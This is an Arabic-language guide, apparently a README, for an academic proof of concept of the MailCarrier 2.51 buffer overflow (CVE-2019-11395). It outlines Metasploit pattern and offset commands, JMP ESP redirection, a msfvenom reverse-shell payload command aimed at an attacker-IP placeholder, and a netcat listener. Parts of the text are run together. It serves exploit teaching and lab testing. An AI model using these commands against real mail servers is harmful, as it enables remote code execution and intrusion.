
إثبات مفهوم لغرض أكاديمي لفهم ثغرة Buffer Overflow باستخدام خلفية CVE-2019-11395
يُظهر هذا الدليل المفاهيمي (PoC) ثغرة تجاوز سعة المخزن المؤقت في MailCarrier 2.51، مما يسمح للمهاجمين عن بُعد بتنفيذ تعليمات برمجية عشوائية عبر سلسلة طويلة. يمكن استغلال الثغرة باستخدام العمليات التالية:
SMTP RCPT TOPOP3 USERPOP3 LISTPOP3 TOPPOP3 RETRيهدف المشروع إلى تقديم منهج أكاديمي لفهم كيفية عمل تجاوز سعة المخزن المؤقت.
قبل تشغيل أي اختبارات، لا تستخدم بيئة الإنتاج الخاصة بك أبدًا للتجارب الأولية. بدلاً من ذلك، قم بإنشاء إعدادات معملية مشابهة لبيئة الإنتاج الخاصة بك لتجنب أي مشكلات أو عواقب غير مقصودة.
msf-pattern_create -l <عدد_البايتات>
يساعد هذا في تحديد الإزاحة، وهو العدد الدقيق للبايتات المطلوبة لاستبدال EIP.
msf-pattern_offset -q <البايتات_المسجلة_على_EIP> -l <عدد_البايتات>
يحدد هذا العدد الدقيق للبايتات المطلوبة للتحكم في EIP.
JMP ESP
CALL ESP
سنستخدم هذا العنوان لإعادة توجيه التنفيذ. كن حذرًا من ASLR أو SafeSEH أو آليات الحماية الأخرى.
msfvenom -p <شيل_كود> LHOST=<عنوان_المهاجم_IP> LPORT=443 -b "<قائمة_الأحرف_الضارة>" exitfunc=thread -f python
NOP (\x90) في الحمولة لتحسين الاستقرار.netcat (nc) لإنشاء شل عكسي والاتصال بالهدف.